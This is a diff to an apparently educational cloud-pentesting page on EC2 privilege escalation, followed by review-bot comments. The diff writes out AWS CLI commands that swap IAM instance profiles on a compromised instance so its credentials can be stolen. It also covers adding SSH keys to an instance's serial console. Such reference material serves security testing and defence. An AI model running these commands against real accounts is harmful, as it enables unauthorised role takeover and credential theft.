diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md index 69126d9fe1..277cb9304a 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md @@ -102,12 +102,13 @@ aws iam add-role-to-instance-profile --instance-profile-name --role-name If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:** -* If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) - * {% code overflow="wrap" %} - ```bash - aws ec2 associate-iam-instance-profile --iam-instance-profile --instance-id - ``` - {% endcode %} +* If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \* + +{% code overflow="wrap" %} +```bash +aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id +``` +{% endcode %} **Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). 
@@ -115,20 +116,25 @@ If the **instance profile has a role** and the attacker **cannot remove it**, th With these permissions it's possible to change the instance profile associated to an instance so if the attack had already access to an instance he will be able to steal credentials for more instance profile roles changing the one associated with it. -* If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it - * {% code overflow="wrap" %} - ```bash - aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da - aws ec2 disassociate-iam-instance-profile --association-id - aws ec2 associate-iam-instance-profile --iam-instance-profile --instance-id - ``` - {% endcode %} -* or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). - * {% code overflow="wrap" %} - ```bash - aws ec2 replace-iam-instance-profile-association --iam-instance-profile --association-id - ``` - {% endcode %} +* If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it \* + +{% code overflow="wrap" %} +```bash +aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da +aws ec2 disassociate-iam-instance-profile --association-id +aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id +``` +{% endcode %} + +* or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). \* + +{% code overflow="wrap" %} +```` +```bash +aws ec2 replace-iam-instance-profile-association --iam-instance-profile --association-id +``` +```` +{% endcode %} **Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). 
@@ -257,7 +263,7 @@ aws ec2-instance-connect send-ssh-public-key \ ### `ec2-instance-connect:SendSerialConsoleSSHPublicKey` -An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** can **add an ssh key to a serial connection**. If the serial is not enable, the attacker needs the permission **`ec2:EnableSerialConsoleAccess` to enable it**. +An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPublicKey`** can **add an ssh key to a serial connection**. If the serial is not enable, the attacker needs the permission **`ec2:EnableSerialConsoleAccess` to enable it**. In order to connect to the serial port you also **need to know the username and password of a user** inside the machine.
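Review bot: In the first hunk (`@@ -102,12 +102,13 @@`), the rewritten bullet `* If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \*` carries a trailing escaped asterisk that is left over from the nested sub-bullet the old version used; it will render as a literal `*` at the end of the line and should be dropped. The substantive change in this hunk, `--iam-instance-profile Name=` in place of a bare `--iam-instance-profile`, is correct: the AWS CLI expects a structure (`Name=` or `Arn=`) for that argument, so the old command would have failed on a parameter-parsing error. The unchanged context line above the bullet still reads `associate the instance profile compromised to a compromised i**nstance:**` with the bold marker opening mid-word; since the surrounding lines are being touched anyway, fixing that to `compromised **instance:**` would be worth folding in.

Review bot: In the second hunk (`@@ -115,20 +116,25 @@`), the `replace-iam-instance-profile-association` snippet is wrapped in an extra four-backtick fence (```` above and below the ```bash block); inside a `{% code %}` block this makes the inner ```bash fence part of the rendered text rather than a code block, and the `describe`/`disassociate`/`associate` snippet in the same hunk has no such wrapper, so the two outer ```` lines should be removed. The same hunk also updates `associate-iam-instance-profile` to `--iam-instance-profile Name=` but leaves `replace-iam-instance-profile-association --iam-instance-profile` unchanged, although that command takes the same structure argument; the two should be brought in line. Both bullets again end in a stray ` \*`. Finally, the `describe-iam-instance-profile-associations` example still embeds a concrete instance id (`i-0d36d47ba15d7b4da`) while every other command uses empty placeholders; replacing it with a placeholder keeps the page consistent and avoids readers copying a real-looking id.

Review bot: In the third hunk (`@@ -257,7 +263,7 @@`), the added sentence about needing an OS username and password to use the serial console is the right caveat to document, but the modified line still carries the pre-existing grammar error `If the serial is not enable`; since the line is being rewritten, it should read `If the serial console is not enabled`. It would also help readers on the defensive side to note, in the same sentence, that this requirement is why leaving password-based local logins disabled on instances limits what `SendSerialConsoleSSHPublicKey` alone can achieve, and that `ec2:EnableSerialConsoleAccess` is an account-level setting worth alerting on.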